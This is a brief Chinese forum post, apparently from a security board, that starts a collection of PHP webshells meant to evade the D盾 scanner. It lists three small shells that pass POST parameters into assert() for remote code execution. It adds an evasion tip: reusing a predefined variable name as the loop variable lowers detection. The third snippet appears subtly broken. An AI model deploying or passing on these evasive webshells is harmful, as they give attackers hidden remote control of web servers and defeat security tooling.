|
|
D盾更新了!准备写一个长期更新的免杀webshell总结
<?php
function a(){
return $a=$_POST['1'];
}
@assert(a());
?>
<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
assert($value);
}
<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");
for ($x=0; $x<=0; $x++) {
assert("$x");
}
可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了
 |
|
发表于 2022-5-8 20:14:30
